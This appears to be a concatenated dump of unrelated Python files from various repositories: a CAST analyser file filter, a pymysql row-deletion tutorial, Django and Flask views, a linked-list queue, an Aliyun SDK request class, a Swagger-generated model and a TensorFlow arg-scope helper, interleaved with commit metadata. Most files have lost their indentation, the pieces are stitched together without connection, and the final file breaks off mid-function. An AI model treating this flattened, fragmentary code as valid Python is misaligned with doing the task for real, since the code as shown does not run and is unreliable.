class FileFilter:
def __init__(self):
jsonPath = os.path.abspath(os.path.join(os.path.dirname(__file__), 'filters.json'))
self.filters = json.loads(open_source_file(jsonPath).read())
self.last_matches_result = None
def get_last_result(self):
return self.last_matches_result if self.last_matches_result else ''
def matches(self, filename, css = False):
self.last_matches_result = None
fname = filename.replace(os.sep, '/')
for _filter in [ _filter for _filter in self.filters if _filter['type'] == 'FilePath' ]:
pattern = _filter['value'].upper()
if css and pattern.endswith(".JS"):
pattern = pattern[0:-3] + '.CSS'
if self.match_string(pattern, fname.upper()):
self.last_matches_result = 'filepath matches pattern ' + pattern
return True
if filename.endswith('.cshtml.html'): # we skip .cshtml.html files because they are generated from .cshtml files
cshtmlFilepath = filename[:-5]
if os.path.isfile(cshtmlFilepath):
self.last_matches_result = 'generated from .cshtml file'
return True
return False
# matches a pattern token containing one or several stars with a string
# A pattern token does not contain /.
# Example: **/*toto*/** contains 3 pattern tokens: **, *toto* and **
def matches_token_with_star(self, patternToken, fnameToken):
vals = patternToken.split('*')
valsFound = []
oneValueNotFound = False
l = len(vals)
cmpt = 0
for val in vals:
if val:
if cmpt == 0:
if not fnameToken.startswith(val):
valsFound.append(False)
oneValueNotFound = True
else:
valsFound.append(True)
elif cmpt == l-1:
if not fnameToken.endswith(val):
valsFound.append(False)
oneValueNotFound = True
else:
valsFound.append(True)
else:
if not val in fnameToken:
valsFound.append(False)
oneValueNotFound = True
else:
valsFound.append(True)
else:
valsFound.append(True)
cmpt += 1
if not oneValueNotFound:
# check that there are no / between matches
i = 0
ok = True
while i < l-1:
middle = fnameToken[len(vals[i]):len(fnameToken)-len(vals[i+1])]
if '/' in middle:
ok = False
i += 1
if ok:
return True
return False
# matches a pattern corresponding to a file path with a string
# Example: **/*toto*/**
def match_string(self, pattern, fname):
patternTokens = pattern.split('/')
fnameTokens = fname.split('/')
cmptFname = len(fnameTokens) - 1
doubleStarJustPassed = False
for patternToken in reversed(patternTokens):
if patternToken == '**':
doubleStarJustPassed = True
continue
starPresent = False
if '*' in patternToken:
starPresent = True
if doubleStarJustPassed:
ok = False
while cmptFname >= 0:
fnameToken = fnameTokens[cmptFname]
cmptFname -= 1
if not starPresent:
if fnameToken == patternToken:
ok = True
break
else:
if self.matches_token_with_star(patternToken, fnameToken):
ok = True
break
if not ok and cmptFname < 0:
return False
else:
fnameToken = fnameTokens[cmptFname]
if not starPresent:
if not fnameToken == patternToken:
return False
else:
if not self.matches_token_with_star(patternToken, fnameToken):
return False
cmptFname -= 1
doubleStarJustPassed = False
if cmptFname >= 0 and patternTokens[0] != '**':
return False
return True
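    # A minimal illustration (hypothetical values; the caller upper-cases paths
    # before matching): match_string('**/NODE_MODULES/**', 'SRC/NODE_MODULES/A/B.JS')
    # is True, while match_string('**/*.MIN.JS', 'SRC/APP.JS') is False because no
    # path token ends in '.MIN.JS'.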
class JSFileFilter(FileFilter):
def __init__(self):
FileFilter.__init__(self)
def match_file(self, filename, bUTF8):
nbLongLines = 0
maxLine = 0
nLine = 0
try:
with open_source_file(filename) as f:
for line in f:
if nLine <= 15:
for _filter in [ _filter for _filter in self.filters if _filter['type'] == 'FileContent' ]:
try:
if re.search(_filter['value'], line):
self.last_matches_result = 'pattern found in file : ' + _filter['value']
return True
except:
cast.analysers.log.debug('Internal issue when filtering file: ' + str(filename) + ' line ' + str(nLine))
cast.analysers.log.debug(str(traceback.format_exc()))
nLine += 1
l = len(line)
if l > 400:
nbLongLines += 1
if l > maxLine:
maxLine = l
except:
cast.analysers.log.debug('Internal issue when filtering file: ' + str(filename))
cast.analysers.log.debug(str(traceback.format_exc()))
        # we check if the file looks like a minified file
if nLine == 0 or nbLongLines / nLine > 0.5 or (nbLongLines / nLine > 0.2 and maxLine > 10000):
self.last_matches_result = 'minified file'
return True
return False
def matches(self, filename):
if FileFilter.matches(self, filename):
return True
try:
return self.match_file(filename, True)
except UnicodeDecodeError:
return self.match_file(filename, False)
class CssFileFilter(FileFilter):
def __init__(self):
FileFilter.__init__(self)
def match_file(self, filename, bUTF8):
nLine = 0
try:
with open_source_file(filename) as f:
for line in f:
if nLine <= 15:
for _filter in [ _filter for _filter in self.filters if _filter['type'] == 'CssFileContent' ]:
try:
if re.search(_filter['value'], line):
self.last_matches_result = 'pattern found in file : ' + _filter['value']
return True
except:
pass
else:
                        break
                    nLine += 1
except:
cast.analysers.log.debug('Internal issue when reading file: ' + str(filename))
cast.analysers.log.debug(str(traceback.format_exc()))
return False
def matches(self, filename):
if FileFilter.matches(self, filename, True):
return True
try:
return self.match_file(filename, True)
except UnicodeDecodeError:
return self.match_file(filename, False)
class HtmlFileFilter(FileFilter):
def __init__(self):
FileFilter.__init__(self)
def match_file(self, filename, bUTF8):
nLine = 0
try:
with open_source_file(filename) as f:
for line in f:
if nLine <= 15:
for _filter in [ _filter for _filter in self.filters if _filter['type'] == 'HtmlFileContent' ]:
try:
if re.search(_filter['value'], line):
self.last_matches_result = 'pattern found in file : ' + _filter['value']
return True
except:
pass
else:
                        break
                    nLine += 1
except:
cast.analysers.log.debug('Internal issue when reading file: ' + str(filename))
cast.analysers.log.debug(str(traceback.format_exc()))
return False
def matches(self, filename):
if FileFilter.matches(self, filename):
return True
try:
return self.match_file(filename, True)
except UnicodeDecodeError:
return self.match_file(filename, False)
# ---- lj1064201288/dell_python: /python3网络爬虫开发实战/数据存储/MySQL实验/删除数据2.py ----
import pymysql
db = pymysql.connect(host="localhost", user='root', password='123456', port=3306, db='django')
cursor = db.cursor()
table = "friends"
age = "age > 30"
sql = 'DELETE FROM {table} WHERE {age}'.format(table=table, age=age)
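# With the values above, the statement sent to MySQL is: DELETE FROM friends WHERE age > 30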
try:
cursor.execute(sql)
print("Successful...")
db.commit()
except:
print("Failed...")
db.rollback()
finally:
db.close()
# ---- BoughezalaMohamedAimen/Amine: /visas/admin.py ----
from django.contrib import admin
from .models import *
# Register your models here.
admin.site.register(Visa)
# ---- reedharder/bending_the_law: /lawsite_nogit/lawsite/wsgi.py ----
"""
WSGI config for lawsite project.
It exposes the WSGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/1.8/howto/deployment/wsgi/
"""
import os
from django.core.wsgi import get_wsgi_application
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "lawsite.settings")
application = get_wsgi_application()
'''
from whitenoise.django import DjangoWhiteNoise
from dj_static import Cling
application = Cling(get_wsgi_application())
application = DjangoWhiteNoise(application)
'''
# ---- RonakNandanwar26/DressitUp: /DressitUp/Home/views.py ----
from django.shortcuts import render, redirect, get_object_or_404
from .forms import ContactForm, ProfileForm, UserForm
from django.contrib import messages
from django.core.mail import send_mail
from DressitUp import settings
from products.forms import ProductForm
# Create your views here.
def home(request):
template = 'Home/index.html'
return render(request, template, {})
def list(request):
template = 'Home/list.html'
return render(request, template, {})
def about(request):
template = 'Home/about.html'
return render(request, template, {})
def shop(request):
template = 'Home/shop.html'
return render(request, template, {})
def contact(request):
if request.method == "POST":
form = ContactForm(request.POST or None)
if form.is_valid():
contact_name = form.cleaned_data['name']
contact_email = form.cleaned_data['email']
sub = form.cleaned_data['subject']
content = form.cleaned_data['message']
print(contact_name)
form.save()
subject = 'Hello ' + contact_name + ' from DressitUp!'
message = 'Stay Connected. We would love to hear you!'
email_from = settings.EMAIL_HOST_USER
email_to = [contact_email, ]
send_mail(subject, message, email_from, email_to)
messages.success(request, 'Form submitted successfully.')
return redirect('Home:home')
else:
messages.error(request, 'Please correct the error below.')
else:
form = ContactForm()
template = 'Home/contact.html'
return render(request, template, {'form': form})
def profile(request):
template = 'Home/profile.html'
if request.method == 'POST':
user_form = UserForm(request.POST or None, request.FILES or None, instance=request.user)
profile_form = ProfileForm(request.POST or None, request.FILES or None, instance=request.user.profile)
if user_form.is_valid() and profile_form.is_valid():
user_form.save()
profile_form.save()
messages.success(request, "Your Profile is Updated Successfully..")
return redirect('Home:home')
else:
messages.error(request, 'Please Correct the error below')
else:
user_form = UserForm(instance=request.user)
profile_form = ProfileForm(instance=request.user.profile)
return render(request, template, {'user_form': user_form,
'profile_form': profile_form})
# ---- AngCosmin/api-flask: /backend/app/controllers/home.py ----
from flask import Blueprint
blueprint = Blueprint('home', __name__)
@blueprint.route('/')
def index():
return 'Hello World'
# ---- KebadSew/scratch_python: /fun2.py ----
# create a function which prints sum of two input number parameters
'''
def sum(x,y):
print("Sum is ",x+y)
sum(5, 7)
# subtract
def mekenes(x,y):
print("Mekenes of x-y is ",x-y)
mekenes(5, 7)
'''
def sum(x, y, z):
return x+y+z
s = sum(8, 6, 2)
print("The sum of 8+6+2 is ", s)
# ---- rishabh-22/BakeryManagement: /BakeryManagement/asgi.py ----
"""
ASGI config for BakeryManagement project.
It exposes the ASGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/3.1/howto/deployment/asgi/
"""
import os
from django.core.asgi import get_asgi_application
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'BakeryManagement.settings')
application = get_asgi_application()
# ---- 18021009/project: /Data.py ----
from math import nan
from os import name
from Station import station
import numpy as np
import datetime
import pandas as pd
from Map import map
from Point import point
# Standardize the date column of data.csv ('M/D/YYYY' strings -> datetime.date)
# ds = pd.read_csv('data.csv')
def changeToDate(output_file):
ds = pd.read_csv('data.csv')
day_delta = datetime.timedelta(days=1)
start_date = datetime.date(2019, 1, 1)
end_date = datetime.date(2020, 1, 1)
for i in range((end_date - start_date).days):
day = start_date + i*day_delta
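        # strftime has no portable "no leading zero" flag, so mark month/day with
        # 'X' and strip 'X0'/'X' to rebuild the file's 'M/D/YYYY' spelling.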
_day = day.strftime('X%m/X%d/%Y').replace('X0','X').replace('X','')
ds['time'] = ds['time'].replace({_day: day})
ds.to_csv(output_file, index=False)
def buffer_data(input_file, buffer):
dataStation = pd.read_csv(input_file)
dataStation['wind_speed'] = nan
dataStation['temperature'] = nan
dataStation['satellite_NO2'] = nan
dataStation["road_density"] = nan
dataStation["relative_humidity"] = nan
dataStation["pressure"] = nan
dataStation["population_density"] = nan
dataStation["pblh"] = nan
dataStation["NDVI"] = nan
dataStation["dpt"] = nan
dataStationArray = dataStation.values
dataStation = pd.DataFrame(dataStationArray, columns=['time', 'lat', 'long', 'NO2', 'name', 'wind_speed' + str(buffer), 'temperature' + str(buffer), 'satellite_NO2' + str(buffer), 'road_density' + str(buffer), 'relative_humidity' + str(buffer), 'pressure' + str(buffer), 'population_density' + str(buffer), 'pblh' + str(buffer), 'NDVI' + str(buffer), 'dpt' + str(buffer)])
dataStation.to_csv(input_file, float_format='{:f}'.format, index=False)
changeToDate('buffer_1_data.csv')
buffer_data('buffer_1_data.csv', 1)
changeToDate('buffer_2_data.csv')
buffer_data('buffer_2_data.csv', 2)
changeToDate('buffer_3_data.csv')
buffer_data('buffer_3_data.csv', 3)
# a = pd.read_csv("buffer_1_data.csv")
# b = pd.read_csv("buffer_2_data.csv")
# merged = a.merge(b, on=['time', 'lat', 'long', 'name'], how='inner')
# merged.to_csv('merge.csv', index=False)
# c = pd.read_csv("merge.csv")
# d = pd.read_csv("buffer_3_data.csv")
# merged = c.merge(d, on=['time', 'lat', 'long', 'name'], how='inner')
# merged.to_csv('merge.csv', index=False)
# buffer_radius
# _buffer_radius = 1
# dataStation = pd.read_csv('college.csv')
# dataStation['wind_speed'] = -999.0
# dataStation["road_dens"] = -999.0
# dataStation["pp_dens"] = -999.0
# dataStation["earth_no2"] = -999.0
# dataStationArray = dataStation.values
# # add wind speed to dataStationArray
# start_date = datetime.date(2019, 1, 1)
# end_date = datetime.date(2020, 1, 1)
# day_delta = datetime.timedelta(days=1)
# for i in range((end_date - start_date).days):
# fileName = "WSPDCombine_"
# day = start_date + i*day_delta
# file = "map/wind_speed/" + fileName + day.strftime('%Y%m%d') + ".tif"
# _map = map()
# _map.setMap(file)
# for data in dataStationArray:
# if((data[0] == day.strftime('%Y-%m-%d'))):
# _point = point(data[2], data[1])
# _point.set_position_on_matrix(_map)
# _station = station(_point, _buffer_radius)
# _station.setBufferValue(_map)
# data[5] = np.float64(_station.bufferValue)
# # add road to college.csv
# _map = map()
# _map.setMap('map/road_density/road_dens.tif')
# for data in dataStationArray:
# _point = point(data[2], data[1])
# _point.set_position_on_matrix(_map)
# _station = station(_point, _buffer_radius)
# _station.setBufferValue(_map)
# data[6] = _station.bufferValue
# # add population_density
# _map = map()
# _map.setMap('map/population_density/ppd.tif')
# for data in dataStationArray:
# _point = point(data[2], data[1])
# _point.set_position_on_matrix(_map)
# _station = station(_point, _buffer_radius)
# _station.setBufferValue(_map)
# data[7] = _station.bufferValue
# # add earth_no2
# for i in range((end_date - start_date).days):
# fileName = "NO2_"
# day = start_date + i*day_delta
# file = "map/NO2/" + fileName + day.strftime('%Y%m%d') + ".tif"
# _map = map()
# _map.setMap(file)
# for data in dataStationArray:
# if((data[0] == day.strftime('%Y-%m-%d'))):
# _point = point(data[2], data[1])
# _point.set_position_on_matrix(_map)
# _station = station(_point, _buffer_radius)
# _station.setBufferValue(_map)
# data[8] = _station.bufferValue
# newDataStation = pd.DataFrame(dataStationArray, columns=['time', 'lat', 'long', 'NO2', 'name', 'wind_speed', 'road_dens', 'pp_dens', 'earth_no2'])
# newDataStation.to_csv('college_2.csv', float_format='{:f}'.format, index=False)
# ---- snahor/chicharron: /cracking-the-code-interview/queue.py ----
from linked_list import Node
class Queue:
'''
>>> q = Queue()
>>> q.enqueue(1)
>>> q.enqueue(2)
>>> q.enqueue(3)
>>> q.dequeue()
1
>>> q.dequeue()
2
>>> q.enqueue(4)
>>> q.enqueue(5)
>>> q.dequeue()
3
>>> q.dequeue()
4
>>> q.dequeue()
5
>>> q.dequeue()
'''
def __init__(self):
self.head = None
self.last = None
def enqueue(self, value):
node = Node(value)
if not self.head:
self.head = node
self.last = node
else:
self.last.next = node
self.last = node
def dequeue(self):
if not self.head:
return None
node = self.head
self.head = node.next
if self.last == node:
self.last = node.next
return node.value
def is_empty(self):
return self.head is None
if __name__ == '__main__':
import doctest
doctest.testmod(optionflags=doctest.ELLIPSIS)
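# For reference, a minimal sketch of the imported dependency, assuming the
# external `linked_list` module provides a node with `value` and `next`
# attributes (inferred from how Queue uses it above):
#
# class Node:
#     def __init__(self, value):
#         self.value = value
#         self.next = None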
|
[
"hans.r.69@gmail.com"
] |
hans.r.69@gmail.com
|
30295c60432b3dc86a5982db72a44530415d66b1
|
893577de9978f7868e7a3608ab697a320adf55f1
|
/python/Day1/problem1_3.py
|
9c71c686b36cf77b1e2c9ff80693415d699a73b8
|
[] |
no_license
|
zealfory/xiyu-NLPTrainee
|
0d8c6ab80cfc7b3a00e886f340f34e5ed4650fc2
|
3e63bad5d53b478563003d0c78fa1cab63fcefb4
|
refs/heads/master
| 2020-06-13T15:24:30.589485
| 2019-08-26T08:15:22
| 2019-08-26T08:15:22
| 194,693,706
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,079
|
py
|
def longestValidParentheses(s):
"""
    :param s: str -- input string
    :return: int -- length of the longest valid parentheses substring
"""
s_length = len(s)
stack = []
start = 0
maxlen = 0
for i in range(s_length):
        # push the index of '(' onto the stack
if s[i] == '(':
stack.append(i)
        # handle ')'
else:
            # stack empty: move the start point past this unmatched ')'
if len(stack) == 0:
start = i + 1
continue
            # stack non-empty: pop the matching '('
            else:
                stack.pop()
                # update the maximum valid length
if len(stack) == 0:
maxlen = max(i - start + 1, maxlen)
else:
maxlen = max(i-stack[-1], maxlen)
return maxlen
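# Worked example of the stack scan on ")()())":
#   i=0 ')' -> stack empty, start = 1
#   i=1 '(' -> push 1
#   i=2 ')' -> pop; stack empty, maxlen = i - start + 1 = 2
#   i=3 '(' -> push 3
#   i=4 ')' -> pop; stack empty, maxlen = i - start + 1 = 4
#   i=5 ')' -> stack empty, start = 6
# Final answer: 4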
# test
def main():
print(longestValidParentheses("(()"))
print(longestValidParentheses(")()())"))
if __name__ == "__main__":
main()
|
[
"noreply@github.com"
] |
noreply@github.com
|
b749d4bcecade6a4c865a8f3a69ebd30954dfe41
|
f09dc121f213f2881df3572288b7ee5b39246d73
|
/aliyun-python-sdk-config/aliyunsdkconfig/request/v20190108/GetSupportedResourceTypesRequest.py
|
8fb02d120fe982b0df0cc395179ce63061909e27
|
[
"Apache-2.0"
] |
permissive
|
hetw/aliyun-openapi-python-sdk
|
2f31378ad6be0896fb8090423f607e9c7d3ae774
|
7443eacee9fbbaa93c7975c6dbec92d3c364c577
|
refs/heads/master
| 2023-01-19T22:42:36.214770
| 2020-12-04T10:55:14
| 2020-12-04T10:55:14
| 318,689,093
| 1
| 0
|
NOASSERTION
| 2020-12-05T03:03:03
| 2020-12-05T03:03:03
| null |
UTF-8
|
Python
| false
| false
| 1,296
|
py
|
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
#
# http://www.apache.org/licenses/LICENSE-2.0
#
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
from aliyunsdkcore.request import RpcRequest
from aliyunsdkconfig.endpoint import endpoint_data
class GetSupportedResourceTypesRequest(RpcRequest):
def __init__(self):
RpcRequest.__init__(self, 'Config', '2019-01-08', 'GetSupportedResourceTypes','Config')
self.set_method('GET')
if hasattr(self, "endpoint_map"):
setattr(self, "endpoint_map", endpoint_data.getEndpointMap())
if hasattr(self, "endpoint_regional"):
setattr(self, "endpoint_regional", endpoint_data.getEndpointRegional())
|
[
"sdk-team@alibabacloud.com"
] |
sdk-team@alibabacloud.com
|
a6b9a81031ca5ebba259e3bfd9015c0ce85b1d1f
|
3e0abf5d310edec9ac8cd939b83518d5f1cb753c
|
/feature-a.py
|
e0ef5294caaa47e7af55eaf6dd68035d8175d3a2
|
[] |
no_license
|
anushkhasingh30/git-1
|
ebc13f9974bee04650e7a6aa0e8313d1ebe5eaac
|
4516ce4a2ac811246c50a7b8012ff4a028959695
|
refs/heads/master
| 2023-06-25T00:04:15.593702
| 2021-07-27T10:38:00
| 2021-07-27T10:38:00
| 389,939,561
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 19
|
py
|
print('feature a ')
|
[
"anushkhasingh30@gmail.com"
] |
anushkhasingh30@gmail.com
|
46cda83c4132a39c6286332ab4240e378fc2e4e7
|
e4ab9d29abcadd76e4f540d3ea5487aff4259004
|
/lab_7.1.py
|
0255a13ca5b7f91bd5fb38e43f948cf43ecf9a42
|
[] |
no_license
|
swyatik/python-KPI
|
83332ed2fa3a49acd6c521416a08c005f4be78d2
|
10adac7d76790256ebe72339455a0a081433d4f6
|
refs/heads/master
| 2020-06-04T22:27:10.463697
| 2019-06-16T16:52:02
| 2019-06-16T16:52:02
| 192,215,205
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,796
|
py
|
class Sphere(object):
def __init__(self, radius = 1.0, x = 0.0, y = 0.0, z = 0.0):
self.radius = float(radius)
self.x = float(x)
self.y = float(y)
self.z = float(z)
def get_volume(self):
v = 4 / 3 * 3.1415926535897932384626433 * self.radius ** 3
return v
def get_square(self):
s = 4 * 3.1415926535897932384626433 * (self.radius ** 2)
return s
def get_radius(self):
return self.radius
def get_center(self):
return (self.x, self.y, self.z,)
    def set_radius(self, r):
        self.radius = float(r)
def set_center(self, x_new, y_new, z_new):
self.x = float(x_new)
self.y = float(y_new)
self.z = float(z_new)
def is_point_inside(self, x_1, y_1, z_1):
self.x_1 = x_1
self.y_1 = y_1
self.z_1 = z_1
rn = ((self.x_1 - self.x) ** 2 + (self.y_1 - self.y) ** 2 + (self.z_1 - self.z) ** 2) ** 0.5
if rn > self.radius:
return False
else:
return True
s1 = Sphere()
print(s1.radius, s1.x, s1.y, s1.z)
print('V1 =', s1.get_volume())
print('S1 =', s1.get_square())
print('R =', s1.get_radius())
print('coordinates = ', s1.get_center())
s1.set_radius(5)
print('R= %s' % (s1.get_radius()))
s1.set_center(1025, 1026, 1027)
print('coordinates=', s1.get_center())
print(s1.is_point_inside(1000, 1000, 1000), '\n')
s0 = Sphere(0.5) # test sphere creation with radius and default center
print(s0.get_center()) # (0.0, 0.0, 0.0)
print(s0.get_volume()) # 0.523598775598
print(s0.is_point_inside(0, -1.5, 0)) # False
s0.set_radius(1.6)
print(s0.is_point_inside(0, -1.5, 0)) # True
print(s0.get_radius()) # 1.6
|
[
"noreply@github.com"
] |
noreply@github.com
|
6fe04aaf0e701031982130a0f867b59e8d83e3ec
|
42d18b5dba342099dae032ab2aa2bb19b995f9be
|
/ch/ch1/wxpy/helper/sendHelper.py
|
836277903d0cc0bfb05cfdad56a0430e3bb0d0a0
|
[] |
no_license
|
wenyaodong777/python-workshop
|
4e38ee7f3c96e8cdac3804c980b735db304ffb18
|
5f7bb9aa227ec46c89f793f592f3c90e9cd50603
|
refs/heads/master
| 2020-05-26T18:14:58.354116
| 2019-05-24T00:52:32
| 2019-05-24T00:52:42
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 158
|
py
|
#!/usr/bin/python
# -*- coding: UTF-8 -*-
class WXSender():
def send(self, groups, content):
for group in groups:
group.send(content)
|
[
"wuchenbao@odc.cmbchina.cn"
] |
wuchenbao@odc.cmbchina.cn
|
f9de853a23a36e10aefcbfd18bf0dfcea6055cfa
|
19d47d47c9614dddcf2f8d744d883a90ade0ce82
|
/pynsxt/swagger_client/models/ns_service_group_list_result.py
|
bbaee722d7f2d1956d8eea75ec65fa8637b79b2e
|
[] |
no_license
|
darshanhuang1/pynsxt-1
|
9ed7c0da9b3a64e837a26cbbd8b228e811cee823
|
fb1091dff1af7f8b8f01aec715682dea60765eb8
|
refs/heads/master
| 2020-05-25T14:51:09.932853
| 2018-05-16T12:43:48
| 2018-05-16T12:43:48
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 9,282
|
py
|
# coding: utf-8
"""
NSX API
VMware NSX REST API # noqa: E501
OpenAPI spec version: 1.0.0
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
import pprint
import re # noqa: F401
import six
from swagger_client.models.list_result import ListResult # noqa: F401,E501
from swagger_client.models.ns_service_group import NSServiceGroup # noqa: F401,E501
from swagger_client.models.resource_link import ResourceLink # noqa: F401,E501
from swagger_client.models.self_resource_link import SelfResourceLink # noqa: F401,E501
class NSServiceGroupListResult(object):
"""NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
"""
"""
Attributes:
swagger_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
swagger_types = {
'_self': 'SelfResourceLink',
'links': 'list[ResourceLink]',
'schema': 'str',
'cursor': 'str',
'sort_ascending': 'bool',
'sort_by': 'str',
'result_count': 'int',
'results': 'list[NSServiceGroup]'
}
attribute_map = {
'_self': '_self',
'links': '_links',
'schema': '_schema',
'cursor': 'cursor',
'sort_ascending': 'sort_ascending',
'sort_by': 'sort_by',
'result_count': 'result_count',
'results': 'results'
}
def __init__(self, _self=None, links=None, schema=None, cursor=None, sort_ascending=None, sort_by=None, result_count=None, results=None): # noqa: E501
"""NSServiceGroupListResult - a model defined in Swagger""" # noqa: E501
self.__self = None
self._links = None
self._schema = None
self._cursor = None
self._sort_ascending = None
self._sort_by = None
self._result_count = None
self._results = None
self.discriminator = None
if _self is not None:
self._self = _self
if links is not None:
self.links = links
if schema is not None:
self.schema = schema
if cursor is not None:
self.cursor = cursor
if sort_ascending is not None:
self.sort_ascending = sort_ascending
if sort_by is not None:
self.sort_by = sort_by
if result_count is not None:
self.result_count = result_count
self.results = results
@property
def _self(self):
"""Gets the _self of this NSServiceGroupListResult. # noqa: E501
:return: The _self of this NSServiceGroupListResult. # noqa: E501
:rtype: SelfResourceLink
"""
return self.__self
@_self.setter
def _self(self, _self):
"""Sets the _self of this NSServiceGroupListResult.
:param _self: The _self of this NSServiceGroupListResult. # noqa: E501
:type: SelfResourceLink
"""
self.__self = _self
@property
def links(self):
"""Gets the links of this NSServiceGroupListResult. # noqa: E501
        The server will populate this field when returning the resource. Ignored on PUT and POST. # noqa: E501
:return: The links of this NSServiceGroupListResult. # noqa: E501
:rtype: list[ResourceLink]
"""
return self._links
@links.setter
def links(self, links):
"""Sets the links of this NSServiceGroupListResult.
        The server will populate this field when returning the resource. Ignored on PUT and POST. # noqa: E501
:param links: The links of this NSServiceGroupListResult. # noqa: E501
:type: list[ResourceLink]
"""
self._links = links
@property
def schema(self):
"""Gets the schema of this NSServiceGroupListResult. # noqa: E501
:return: The schema of this NSServiceGroupListResult. # noqa: E501
:rtype: str
"""
return self._schema
@schema.setter
def schema(self, schema):
"""Sets the schema of this NSServiceGroupListResult.
:param schema: The schema of this NSServiceGroupListResult. # noqa: E501
:type: str
"""
self._schema = schema
@property
def cursor(self):
"""Gets the cursor of this NSServiceGroupListResult. # noqa: E501
Opaque cursor to be used for getting next page of records (supplied by current result page) # noqa: E501
:return: The cursor of this NSServiceGroupListResult. # noqa: E501
:rtype: str
"""
return self._cursor
@cursor.setter
def cursor(self, cursor):
"""Sets the cursor of this NSServiceGroupListResult.
Opaque cursor to be used for getting next page of records (supplied by current result page) # noqa: E501
:param cursor: The cursor of this NSServiceGroupListResult. # noqa: E501
:type: str
"""
self._cursor = cursor
@property
def sort_ascending(self):
"""Gets the sort_ascending of this NSServiceGroupListResult. # noqa: E501
:return: The sort_ascending of this NSServiceGroupListResult. # noqa: E501
:rtype: bool
"""
return self._sort_ascending
@sort_ascending.setter
def sort_ascending(self, sort_ascending):
"""Sets the sort_ascending of this NSServiceGroupListResult.
:param sort_ascending: The sort_ascending of this NSServiceGroupListResult. # noqa: E501
:type: bool
"""
self._sort_ascending = sort_ascending
@property
def sort_by(self):
"""Gets the sort_by of this NSServiceGroupListResult. # noqa: E501
Field by which records are sorted # noqa: E501
:return: The sort_by of this NSServiceGroupListResult. # noqa: E501
:rtype: str
"""
return self._sort_by
@sort_by.setter
def sort_by(self, sort_by):
"""Sets the sort_by of this NSServiceGroupListResult.
Field by which records are sorted # noqa: E501
:param sort_by: The sort_by of this NSServiceGroupListResult. # noqa: E501
:type: str
"""
self._sort_by = sort_by
@property
def result_count(self):
"""Gets the result_count of this NSServiceGroupListResult. # noqa: E501
Count of results found (across all pages), set only on first page # noqa: E501
:return: The result_count of this NSServiceGroupListResult. # noqa: E501
:rtype: int
"""
return self._result_count
@result_count.setter
def result_count(self, result_count):
"""Sets the result_count of this NSServiceGroupListResult.
Count of results found (across all pages), set only on first page # noqa: E501
:param result_count: The result_count of this NSServiceGroupListResult. # noqa: E501
:type: int
"""
self._result_count = result_count
@property
def results(self):
"""Gets the results of this NSServiceGroupListResult. # noqa: E501
Paged collection of NSServiceGroups # noqa: E501
:return: The results of this NSServiceGroupListResult. # noqa: E501
:rtype: list[NSServiceGroup]
"""
return self._results
@results.setter
def results(self, results):
"""Sets the results of this NSServiceGroupListResult.
Paged collection of NSServiceGroups # noqa: E501
:param results: The results of this NSServiceGroupListResult. # noqa: E501
:type: list[NSServiceGroup]
"""
if results is None:
raise ValueError("Invalid value for `results`, must not be `None`") # noqa: E501
self._results = results
def to_dict(self):
"""Returns the model properties as a dict"""
result = {}
for attr, _ in six.iteritems(self.swagger_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
return result
def to_str(self):
"""Returns the string representation of the model"""
return pprint.pformat(self.to_dict())
def __repr__(self):
"""For `print` and `pprint`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, NSServiceGroupListResult):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""Returns true if both objects are not equal"""
return not self == other
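# A minimal usage sketch (values are placeholders, not real API output):
#
# page = NSServiceGroupListResult(results=[], result_count=0)
# print(page.to_dict())  # {'_self': None, 'links': None, ..., 'results': []}
# print(page)            # __repr__ delegates to to_str()/pprint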
|
[
"tcraft@pivotal.io"
] |
tcraft@pivotal.io
|
a7ac6aca6ae6303875db1502f4c7a1f188290a7d
|
bead792530ab007addd60ce777e9ce19bc45cc74
|
/inception-google/utils.py
|
b797d03ecbf9e46c79fdd3249d8fbd5b928d25c1
|
[] |
no_license
|
knowmefly/Youth-AI-SelfImprovement
|
aefb47bf13284509372cfd6c1ea14a81e2be21ce
|
bb15cdc07dc6c231b5d44acae088f98a44f97761
|
refs/heads/master
| 2020-04-25T04:26:20.997249
| 2019-03-06T20:33:08
| 2019-03-06T20:33:08
| 172,510,073
| 2
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,371
|
py
|
# -*- coding: utf-8 -*-
import tensorflow as tf
slim = tf.contrib.slim
# Define the default arg scope for Inception-style networks
def inception_arg_scope(weight_decay=0.00004,
use_batch_norm=True,
batch_norm_decay=0.9997,
batch_norm_epsilon=0.001,
activation_fn=tf.nn.relu,
batch_norm_updates_collections=tf.GraphKeys.UPDATE_OPS):
    # Parameters passed to the batch normalization layers
batch_norm_params = {
'decay': batch_norm_decay,
'epsilon': batch_norm_epsilon,
'updates_collections': batch_norm_updates_collections,
'fused': None,
}
if use_batch_norm:
normalizer_fn = slim.batch_norm
normalizer_params = batch_norm_params
else:
normalizer_fn = None
